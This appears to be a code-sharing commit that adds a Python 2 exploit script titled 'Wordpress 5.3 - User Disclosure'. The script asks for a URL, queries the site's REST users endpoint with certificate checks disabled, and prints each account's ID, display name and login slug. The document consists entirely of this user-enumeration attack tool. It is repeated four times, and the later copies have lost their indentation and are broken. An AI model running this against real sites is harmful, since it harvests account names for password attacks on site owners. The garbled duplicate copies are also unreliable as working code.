andripwn · August 11, 2020 17:44
diff --git a/wp-usr.py b/wp-usr.py
 # Exploit Title : Wordpress 5.3 - User Disclosure
 # Author: Pwn0sec
 # Date: 2020-08-12
 # Software Link: https://wordpress.org/download/
 # version : wp < 5.3
 # tested on : Ubunutu 18.04 / python 2.7
 # CVE: N/A


 #!/usr/bin/python
 # -*- coding: utf-8 -*-
 #

 
 import requests
 import os
 import re
 import json
 import sys
 import urllib3
 
 def clear():
    linux = 'clear'
    windows = 'cls'
    os.system([linux, windows][os.name == 'nt'])
 def Banner():
        print('''
 - Wordpress < 5.3 - User Enumeration
 - SajjadBnd
 ''')
 def Desc():
    url = raw_input('[!] Url >> ')
    vuln = url + "/wp-json/wp/v2/users/"
    while True:
        try:
            r = requests.get(vuln,verify=False)
            content = json.loads(r.text)
            data(content)
        except requests.exceptions.MissingSchema:
        vuln = "http://" + vuln
 def data(content):
    for x in content:
    name = x["name"].encode('UTF-8')
    print("======================")
    print("[+] ID : " + str(x["id"]))
    print("[+] Name : " + name)
    print("[+] User : " + x["slug"])
    sys.exit(1)
 if __name__ == '__main__':
    urllib3.disable_warnings()
    reload(sys)
    sys.setdefaultencoding('UTF8')
    clear()
    Banner()
    Desc()

 wpuser.txt

 #!/usr/bin/python
 # -*- coding: utf-8 -*-
 #
 # Exploit Title : Wordpress < 5.3 - User Disclosure
 # Exploit Author: Pwn0sec
 # email : [email protected]
 # Software Link: https://wordpress.org/download/
 # version : wp < 5.3
 # tested on : Ubunutu 18.04 / python 2.7

 import requests
 import os
 import re
 import json
 import sys
 import urllib3

 def clear():
    linux = 'clear'
    windows = 'cls'
    os.system([linux, windows][os.name == 'nt'])

 def Banner():
        print('''
 - Wordpress < 5.3 - User Enumeration
 - SajjadBnd
 ''')

 def Desc():
    url = raw_input('[!] Url >> ')
    vuln = url + "/wp-json/wp/v2/users/"
    while True:
        try:
            r = requests.get(vuln,verify=False)
            content = json.loads(r.text)
            data(content)
    	except requests.exceptions.MissingSchema:
 	    vuln = "http://" + vuln

 def data(content):
    for x in content:
 	name = x["name"].encode('UTF-8')
 	print("======================")
 	print("[+] ID : " + str(x["id"]))
 	print("[+] Name : " + name)
 	print("[+] User : " + x["slug"])
    sys.exit(1)
 if __name__ == '__main__':
    urllib3.disable_warnings()
    reload(sys)
    sys.setdefaultencoding('UTF8')
    clear()
    Banner()
    Desc()
	# Exploit Title : Wordpress 5.3 - User Disclosure
	# Author: Pwn0sec
	# Date: 2020-08-12
	# Software Link: https://wordpress.org/download/
	# version : wp < 5.3
	# tested on : Ubunutu 18.04 / python 2.7
	# CVE: N/A


	#!/usr/bin/python
	# -- coding: utf-8 --
	#


	import requests
	import os
	import re
	import json
	import sys
	import urllib3

	def clear():
	linux = 'clear'
	windows = 'cls'
	os.system([linux, windows][os.name == 'nt'])
	def Banner():
	print('''
	- Wordpress < 5.3 - User Enumeration
	- SajjadBnd
	''')
	def Desc():
	url = raw_input('[!] Url >> ')
	vuln = url + "/wp-json/wp/v2/users/"
	while True:
	try:
	r = requests.get(vuln,verify=False)
	content = json.loads(r.text)
	data(content)
	except requests.exceptions.MissingSchema:
	vuln = "http://" + vuln
	def data(content):
	for x in content:
	name = x["name"].encode('UTF-8')
	print("======================")
	print("[+] ID : " + str(x["id"]))
	print("[+] Name : " + name)
	print("[+] User : " + x["slug"])
	sys.exit(1)
	if __name__ == '__main__':
	urllib3.disable_warnings()
	reload(sys)
	sys.setdefaultencoding('UTF8')
	clear()
	Banner()
	Desc()

	wpuser.txt

	#!/usr/bin/python
	# -- coding: utf-8 --
	#
	# Exploit Title : Wordpress < 5.3 - User Disclosure
	# Exploit Author: Pwn0sec
	# email : [email protected]
	# Software Link: https://wordpress.org/download/
	# version : wp < 5.3
	# tested on : Ubunutu 18.04 / python 2.7

	import requests
	import os
	import re
	import json
	import sys
	import urllib3

	def clear():
	linux = 'clear'
	windows = 'cls'
	os.system([linux, windows][os.name == 'nt'])

	def Banner():
	print('''
	- Wordpress < 5.3 - User Enumeration
	- SajjadBnd
	''')

	def Desc():
	url = raw_input('[!] Url >> ')
	vuln = url + "/wp-json/wp/v2/users/"
	while True:
	try:
	r = requests.get(vuln,verify=False)
	content = json.loads(r.text)
	data(content)
	except requests.exceptions.MissingSchema:
	vuln = "http://" + vuln

	def data(content):
	for x in content:
	name = x["name"].encode('UTF-8')
	print("======================")
	print("[+] ID : " + str(x["id"]))
	print("[+] Name : " + name)
	print("[+] User : " + x["slug"])
	sys.exit(1)
	if __name__ == '__main__':
	urllib3.disable_warnings()
	reload(sys)
	sys.setdefaultencoding('UTF8')
	clear()
	Banner()
	Desc()